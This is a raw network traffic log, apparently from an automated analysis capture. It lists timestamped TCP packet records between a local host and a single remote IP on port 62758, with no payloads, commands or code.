Jan 2, 2022 02:28:29.316212893 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.316242933 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.316272974 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.316287994 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.316312075 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.316330910 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.316340923 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.316411018 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.481211901 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481268883 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481298923 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481345892 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481378078 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481416941 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481448889 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481458902 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.481477976 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481509924 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481511116 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.481540918 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.481542110 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481573105 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481585026 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.481612921 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481650114 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481671095 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481693029 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.481703043 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481724977 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.481730938 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481760979 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481791973 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481800079 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.481822014 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481827974 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.481851101 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481880903 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481919050 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481930017 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.481950045 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.481962919 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.481977940 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482007980 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482048988 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482053995 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.482079983 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482117891 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482124090 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.482146978 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482158899 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.482178926 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482209921 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482247114 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482256889 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.482275963 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482286930 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.482306004 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482325077 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482362986 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482372046 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.482392073 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482423067 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482460976 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482465029 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.482491970 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482528925 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482534885 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.482558012 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482595921 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482604980 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.482625961 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482635021 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.482656956 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482686043 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482716084 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482745886 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482769012 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.482775927 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482795000 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.482817888 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.647615910 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647641897 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647659063 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647676945 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647696972 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647730112 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647747040 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647766113 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647789955 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647804022 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.647808075 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647825003 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647847891 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647866011 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.647866011 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647882938 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647901058 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647918940 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647937059 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647938967 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.647943020 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.647955894 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647973061 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.647983074 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.647999048 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648017883 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648019075 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.648039103 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648051977 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648066998 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.648071051 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648088932 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648092985 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.648107052 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648123980 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.648124933 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648142099 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648153067 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.648154020 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648170948 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648179054 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.648189068 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648206949 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648230076 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648247004 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648252010 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.648272038 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648288965 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.648288965 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648308992 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648319006 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.648324966 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648343086 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648344040 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.648360968 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648377895 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648379087 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.648396015 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648412943 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648416996 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.648431063 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648447037 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.648448944 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648464918 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648488045 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648504972 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648507118 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.648521900 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648533106 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.648542881 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.648575068 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.813393116 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.813450098 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.813492060 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.813532114 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.813570976 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.813602924 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.813611031 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.813647985 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.813652039 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.813689947 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.813694000 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.813728094 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.813766003 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.813796997 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.813805103 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.813843012 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.813853979 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.813882113 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.813920021 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.813936949 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.813960075 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.813990116 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.813998938 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814038038 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814049959 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.814078093 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814115047 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814156055 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814172029 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.814196110 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814234972 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814249992 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.814279079 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814315081 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814351082 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.814356089 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814368010 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.814395905 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814433098 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814444065 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.814474106 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814512014 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814551115 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814575911 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.814605951 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814635992 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.814644098 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814685106 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814713001 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.814739943 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814776897 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814800978 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.814815998 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814861059 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814881086 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814923048 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.814928055 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.814949989 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.814963102 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815001965 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815045118 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.815045118 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815082073 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815093994 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.815119982 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815160990 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815172911 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.815201044 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815239906 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815272093 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.815275908 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815304995 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815341949 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815346003 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.815380096 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815427065 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815468073 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815483093 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.815506935 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815538883 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.815551996 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815577030 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815608978 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815638065 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.815643072 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815675020 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.815682888 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815722942 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815759897 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815788031 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.815798044 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815829039 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815859079 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815886974 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815912962 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.815926075 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.815937996 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.815965891 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.816004992 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.816025972 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.816042900 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.816082954 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.816111088 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.816137075 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.816175938 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.816448927 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.816487074 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.816525936 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.816556931 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.816561937 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.816591978 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:29.816606045 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:29.819777966 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:30.391638041 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:30.391742945 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:30.557352066 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:30.559040070 CET	62758	49843	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:30.559295893 CET	49843	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:33.440269947 CET	62758	49836	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:33.442862034 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:33.483221054 CET	49836	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:33.607809067 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:33.608316898 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:33.617489100 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:33.786900997 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:33.848304033 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.012727976 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.026995897 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.244427919 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.244527102 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.415608883 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.415633917 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.415651083 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.415668011 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.415683031 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.415699005 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.415714025 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.415729046 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.415745020 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.415760994 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.415771961 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.415780067 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.415793896 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.415796041 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.415797949 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.418210983 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.580166101 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.580188036 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.580204964 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.580219984 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.580235958 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.580250978 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.580266953 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.580282927 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.580297947 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.580311060 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.580321074 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.580332994 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.580343962 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.580359936 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.580368042 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.580878019 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.580892086 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.580894947 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.582315922 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.582340002 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.582355022 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.582372904 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.582384109 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.582604885 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.582644939 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.582657099 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.582963943 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.582972050 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.582979918 CET	49844	62758	192.168.2.6	207.32.218.236
Jan 2, 2022 02:28:34.747047901 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747123957 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747155905 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747184992 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747215033 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747253895 CET	62758	49844	207.32.218.236	192.168.2.6
Jan 2, 2022 02:28:34.747292995 CET	62758	49844	207.32.218.236	192.168.2.6
